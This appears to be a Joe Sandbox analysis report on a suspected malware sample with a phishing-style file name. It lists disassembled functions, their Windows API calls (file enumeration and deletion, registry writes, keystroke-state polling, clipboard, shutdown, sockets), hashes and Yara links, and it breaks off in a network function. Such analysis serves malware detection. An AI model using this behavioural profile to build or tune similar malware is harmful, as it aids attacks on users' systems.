Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
Opcode Fuzzy Hash: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66

Function 0046EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0046EFB6
_wcscmp.LIBCMT ref: 0046EFCB
_wcscmp.LIBCMT ref: 0046EFE2
GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
FindClose.KERNEL32(00000000), ref: 0046F031
FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
_wcscmp.LIBCMT ref: 0046F074
_wcscmp.LIBCMT ref: 0046F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
FindClose.KERNEL32(00000000), ref: 0046F0D2
FindClose.KERNEL32(00000000), ref: 0046F0E4

Strings

*.*, xrefs: 0046F048

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E

Function 00480857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
RegCloseKey.ADVAPI32(?), ref: 00480DB2
RegCloseKey.ADVAPI32(00000000), ref: 00480DBF

Strings

REG_DWORD, xrefs: 00480C83
REG_MULTI_SZ, xrefs: 00480B7A
REG_EXPAND_SZ, xrefs: 00480A2F
REG_BINARY, xrefs: 00480D4D
REG_SZ, xrefs: 00480AD0
REG_QWORD, xrefs: 00480D00

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 83b45bc4bd5ffc8e8bad3d2a440ddb61cfa45c9d9296baa340c0b09b397d7d55
Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
Opcode Fuzzy Hash: 83b45bc4bd5ffc8e8bad3d2a440ddb61cfa45c9d9296baa340c0b09b397d7d55
Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89

Function 004166E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON

Download Yara Rule

Strings

CRLF), xrefs: 004512C1
NO_START_OPT), xrefs: 0045114F
NO_AUTO_POSSESS), xrefs: 0045112E
LF), xrefs: 004512A4
0FJ, xrefs: 00416747
3cA, xrefs: 004168FF
LIMIT_RECURSION=, xrefs: 004511FC
0EJ, xrefs: 0041673D
LIMIT_MATCH=, xrefs: 00451170
_A, xrefs: 00451465, 0045150C, 004515B4
ANYCRLF), xrefs: 004512FB
UCP), xrefs: 0045110D
UTF), xrefs: 004510FA
pGJ, xrefs: 00416751
BSR_UNICODE), xrefs: 00451338
UTF16), xrefs: 004510CF
ANY), xrefs: 004512DE
0DJ, xrefs: 00416733
BSR_ANYCRLF), xrefs: 0045131E
CR), xrefs: 00451287

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID:
String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
API String ID: 0-559809668
Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98

Function 0046F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0046F113
_wcscmp.LIBCMT ref: 0046F128
_wcscmp.LIBCMT ref: 0046F13F

Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0

FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
FindClose.KERNEL32(00000000), ref: 0046F179
FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
_wcscmp.LIBCMT ref: 0046F1BC
_wcscmp.LIBCMT ref: 0046F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
FindClose.KERNEL32(00000000), ref: 0046F21A
FindClose.KERNEL32(00000000), ref: 0046F22C

Strings

*.*, xrefs: 0046F190

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D

Function 0046A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
__swprintf.LIBCMT ref: 0046A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
_memset.LIBCMT ref: 0046A2B2
_wcsncpy.LIBCMT ref: 0046A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
CloseHandle.KERNEL32(00000000), ref: 0046A32E
RemoveDirectoryW.KERNEL32(?), ref: 0046A337
CloseHandle.KERNEL32(00000000), ref: 0046A341

Strings

:, xrefs: 0046A252
\, xrefs: 0046A247
\??\%s, xrefs: 0046A22B

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29

Function 0046001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00460097
SetKeyboardState.USER32(?), ref: 00460102
GetAsyncKeyState.USER32(000000A0), ref: 00460122
GetKeyState.USER32(000000A0), ref: 00460139
GetAsyncKeyState.USER32(000000A1), ref: 00460168
GetKeyState.USER32(000000A1), ref: 00460179
GetAsyncKeyState.USER32(00000011), ref: 004601A5
GetKeyState.USER32(00000011), ref: 004601B3
GetAsyncKeyState.USER32(00000012), ref: 004601DC
GetKeyState.USER32(00000012), ref: 004601EA
GetAsyncKeyState.USER32(0000005B), ref: 00460213
GetKeyState.USER32(0000005B), ref: 00460221

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B

Function 004803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
RegCloseKey.ADVAPI32(00000000), ref: 0048082F

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 458476e3a39306be6292dea122df7d430d7753f5c4d2246d62ccafb6d8a5f971
Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
Opcode Fuzzy Hash: 458476e3a39306be6292dea122df7d430d7753f5c4d2246d62ccafb6d8a5f971
Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56

Function 00474164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0047418B
EmptyClipboard.USER32 ref: 00474191
GlobalAlloc.KERNEL32(00000002,?), ref: 004741A6
CloseClipboard.USER32 ref: 00474245

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D

Function 004637EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770

Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32

FindFirstFileW.KERNEL32(?,?), ref: 004638A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0046394B
MoveFileW.KERNEL32(?,?), ref: 0046395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0046397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 0046399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 004639B9

Strings

\*.*, xrefs: 0046384E, 00463857, 0046386C

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 3f11042d7402f236aab81219c2fd7e0d2b8e7b9acbbe4fdc7f8742a531ec0f52
Instruction ID: 5f3270bf9419f81a9c4f0e0ab399985bb250d256c3569b2459e2ec67edc6ab47
Opcode Fuzzy Hash: 3f11042d7402f236aab81219c2fd7e0d2b8e7b9acbbe4fdc7f8742a531ec0f52
Instruction Fuzzy Hash: 5551717180514CAACF05EFA1C9929EEB778AF14319F60047EE40277191EB396F0DCB5A

Function 0046F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
Sleep.KERNEL32(0000000A), ref: 0046F470
_wcscmp.LIBCMT ref: 0046F484
_wcscmp.LIBCMT ref: 0046F49F
FindNextFileW.KERNEL32(?,?), ref: 0046F53D
FindClose.KERNEL32(00000000), ref: 0046F553

Strings

*.*, xrefs: 0046F425

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: e5d501dff5d889b604b2209ad413e00183518db45aed2e2415d7f621fa1a1f28
Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
Opcode Fuzzy Hash: e5d501dff5d889b604b2209ad413e00183518db45aed2e2415d7f621fa1a1f28
Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59

Function 00413030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

Strings

3cA, xrefs: 00413225
_A, xrefs: 00413322

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: __itow__swprintf
String ID: 3cA$_A
API String ID: 674341424-3480954128
Opcode ID: 5e64bbbaf19f084920888253dab756b3a75f3fd8efad323a8efc832b65d9b115
Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
Opcode Fuzzy Hash: 5e64bbbaf19f084920888253dab756b3a75f3fd8efad323a8efc832b65d9b115
Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B

Function 00415760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004158A5
_memmove.LIBCMT ref: 004158F5
_memmove.LIBCMT ref: 0041595B

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: c0a40cdccc9fe537faa311a02d76c88b90817d2a57610f6cfa77f1ede9afd5ea
Instruction ID: fe3fa380dd79410c0d4e58696af30f423fcd40af0ea7aa6f8d28fb308e13f721
Opcode Fuzzy Hash: c0a40cdccc9fe537faa311a02d76c88b90817d2a57610f6cfa77f1ede9afd5ea
Instruction Fuzzy Hash: 9D12AC70A00609DFCF04DFA5D981AEEB3F5FF88304F10452AE846A7291EB39AD55CB59

Function 004651BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865

ExitWindowsEx.USER32(?,00000000), ref: 004651F9

Strings

SeShutdownPrivilege, xrefs: 004651C9
, xrefs: 004651E7
@, xrefs: 004651EC

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
Instruction Fuzzy Hash: D201F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F

Function 00476283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004762DC
WSAGetLastError.WSOCK32(00000000), ref: 004762EB
